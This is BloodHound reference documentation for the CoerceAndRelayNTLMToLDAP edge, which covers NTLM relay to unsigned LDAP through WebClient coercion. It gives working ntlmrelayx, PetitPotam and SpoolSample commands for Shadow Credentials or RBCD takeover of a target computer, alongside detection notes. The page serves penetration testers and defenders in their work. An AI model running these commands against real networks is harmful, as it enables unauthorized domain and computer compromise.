> ## Documentation Index
> Fetch the complete documentation index at: https://bloodhound.specterops.io/llms.txt
> Use this file to discover all available pages before exploring further.

# CoerceAndRelayNTLMToLDAP

> The target computer can be coerced to authenticate via NTLM to an LDAP service on a domain controller that does not require LDAP signing, allowing an attacker to abuse Active Directory permissions or obtain administrative access to the target computer.

<img noZoom src="https://mintcdn.com/specterops/tTIczgde9H07oLXf/assets/enterprise-AND-community-edition-pill-tag.svg?fit=max&auto=format&n=tTIczgde9H07oLXf&q=85&s=ad49a576589f4d2a8081df77d07fdf56" alt="Applies to BloodHound Enterprise and CE" width="482" height="45" data-path="assets/enterprise-AND-community-edition-pill-tag.svg" />

This edge indicates that the target computer has the WebClient service running. This enables an attacker with "Authenticated Users" access to trigger WebClient-based coercion from the target computer to their attacker-controlled host via NTLM. Since the connection originates from the WebClient instead of SMB, the attacker can relay the authentication attempt to the LDAP service of a domain controller that does not require LDAP signing. This relay can be used to abuse Active Directory permissions or obtain administrative access to the target computer using Resource-Based Constrained Delegation (RBCD) or Shadow Credentials.

## Abuse Info

This section provides general guidance about abusing this edge. For detailed instructions, see [references](#references) at the end of this article.

### Linux

1. **Start the Relay Server**

   The NTLM relay can be executed with [ntlmrelayx.py](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py). To relay to LDAP and perform a Shadow Credentials attack against the target computer:

   ```bash theme={null}
   ntlmrelayx.py -t ldap://<Domain Controller IP> --shadow-credentials
   ```

2. **Coerce the Target Computer**

   Several coercion methods are documented here: [Windows Coerced Authentication Methods](https://github.com/p0dalirius/windows-coerced-authentication-methods).

   Examples of tools include:

   * [printerbug.py](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py)
   * [PetitPotam](https://github.com/topotam/PetitPotam)

   To trigger WebClient coercion (instead of regular SMB coercion), the listener must use a WebDAV Connection String format: `\\SERVER_NETBIOS@PORT/PATH/TO/FILE`.

   ```bash theme={null}
   petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS@PORT/file.txt" "VICTIM_IP"
   ```

### Windows

1. **Start the Relay Server**

   The NTLM relay can be executed with [Inveigh](https://github.com/Kevin-Robertson/Inveigh).

2. **Coerce the Target Computer**

   Several coercion methods are documented here: [Windows Coerced Authentication Methods](https://github.com/p0dalirius/windows-coerced-authentication-methods). Examples of tools include:

   * [SpoolSample](https://github.com/leechristensen/SpoolSample)
   * [PetitPotam](https://github.com/topotam/PetitPotam)

   To trigger WebClient coercion (instead of regular SMB coercion), the listener must use a WebDAV connection string format: `\\SERVER_NETBIOS@PORT/PATH/TO/FILE`.

   Example:

   ```ps theme={null}
   SpoolSample.exe "VICTIM_IP" "ATTACKER_NETBIOS@PORT/file.txt"
   ```

## Opsec Considerations

NTLM relayed authentications can be detected by login events where the IP address does not match the computer's actual IP address. This detection technique is described in the blog post: [Detecting NTLM Relay Attacks](https://posts.bluraven.io/detecting-ntlm-relay-attacks-d92e99e68fb9).

## Edge Schema

Source: `Authenticated Users`, [Group](/resources/nodes/group)\
Destination: [Computer](/resources/nodes/computer)\
Traversable: **Yes**

## References

* [Hackndo: NTLM relay](https://en.hackndo.com/ntlm-relay/)
* [Microsoft: NTLM Overview](https://learn.microsoft.com/en-us/windows-server/security/kerberos/ntlm-overview)
* [Relay Your Heart Away: An OPSEC-Conscious Approach to 445 Takeover](https://specterops.io/blog/2024/08/01/relay-your-heart-away-an-opsec-conscious-approach-to-445-takeover/)
* [Inveigh](https://github.com/Kevin-Robertson/Inveigh)
* [Windows Coerced Authentication Methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)
* [PetitPotam](https://github.com/topotam/PetitPotam)
* [SpoolSample](https://github.com/leechristensen/SpoolSample)
* [Beyond the Basics: Exploring Uncommon NTLM Relay Attack Techniques](https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/)
* [printerbug.py](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py)
* [I'm bringing relaying back: A comprehensive guide on relaying anno 2022](https://trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022)
* [ntlmrelayx.py](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py)
* [2020, 2023, and 2024 LDAP channel binding and LDAP signing requirements for Windows (KB4520412)](https://support.microsoft.com/en-us/topic/2020-2023-and-2024-ldap-channel-binding-and-ldap-signing-requirements-for-windows-kb4520412-ef185fb8-00f7-167d-744c-f299a66fc00a)
* [Detecting NTLM Relay Attacks](https://posts.bluraven.io/detecting-ntlm-relay-attacks-d92e99e68fb9)